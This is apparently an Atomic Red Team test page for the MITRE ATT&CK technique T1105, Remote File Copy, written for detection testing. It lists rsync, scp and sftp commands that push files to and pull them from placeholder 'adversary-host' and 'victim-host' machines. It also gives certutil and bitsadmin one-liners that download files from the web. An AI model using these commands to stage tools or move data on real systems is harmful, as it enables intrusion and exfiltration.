Skip to content

Latest commit

 

History

History
243 lines (158 loc) · 7.76 KB

T1105.md

File metadata and controls

243 lines (158 loc) · 7.76 KB

T1105 - Remote File Copy

Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

Adversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.

Atomic Tests


Atomic Test #1 - rsync remote file copy (push)

Utilize rsync to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
local_path Path of folder to copy Path /tmp/adversary-rsync/
username User account to authenticate on remote host String victim
remote_host Remote host to copy toward String victim-host
remote_path Remote path to receive rsync Path /tmp/victim-files

Run it with bash!

rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}


Atomic Test #2 - rsync remote file copy (pull)

Utilize rsync to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
remote_path Path of folder to copy Path /tmp/adversary-rsync/
username User account to authenticate on remote host String adversary
remote_host Remote host to copy from String adversary-host
local_path Local path to receive rsync Path /tmp/victim-files

Run it with bash!

rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}


Atomic Test #3 - scp remote file copy (push)

Utilize scp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
local_file Path of file to copy Path /tmp/adversary-scp
username User account to authenticate on remote host String victim
remote_host Remote host to copy toward String victim-host
remote_path Remote path to receive scp Path /tmp/victim-files/

Run it with bash!

scp #{local_file} #{username}@#{remote_host}:#{remote_path}


Atomic Test #4 - scp remote file copy (pull)

Utilize scp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
remote_file Path of file to copy Path /tmp/adversary-scp
username User account to authenticate on remote host String adversary
remote_host Remote host to copy from String adversary-host
local_path Local path to receive scp Path /tmp/victim-files/

Run it with bash!

scp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #5 - sftp remote file copy (push)

Utilize sftp to perform a remote file copy (push)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
local_file Path of file to copy Path /tmp/adversary-sftp
username User account to authenticate on remote host String victim
remote_host Remote host to copy toward String victim-host
remote_path Remote path to receive sftp Path /tmp/victim-files/

Run it with bash!

sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'


Atomic Test #6 - sftp remote file copy (pull)

Utilize sftp to perform a remote file copy (pull)

Supported Platforms: Linux, macOS

Inputs

Name Description Type Default Value
remote_file Path of file to copy Path /tmp/adversary-sftp
username User account to authenticate on remote host String adversary
remote_host Remote host to copy from String adversary-host
local_path Local path to receive sftp Path /tmp/victim-files/

Run it with bash!

sftp #{username}@#{remote_host}:#{remote_file} #{local_path}


Atomic Test #7 - certutil download (urlcache)

Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!

Supported Platforms: Windows

Inputs

Name Description Type Default Value
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path Local path to place file Path Atomic-license.txt

Run it with command_prompt!

cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}


Atomic Test #8 - certutil download (verifyctl)

Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!

Supported Platforms: Windows

Inputs

Name Description Type Default Value
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path Local path to place file Path Atomic-license.txt

Run it with powershell!

$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f #{remote_file}
Get-ChildItem | Where-Object {$_.Name -notlike "*.txt"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }


Atomic Test #9 - Windows - BITSAdmin BITS Download

This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads.

Supported Platforms: Windows

Inputs

Name Description Type Default Value
bits_job_name Name of the created BITS job String qcxjb7
remote_file URL of file to copy Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path Local path to place file Path Atomic-license.txt

Run it with command_prompt!

C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}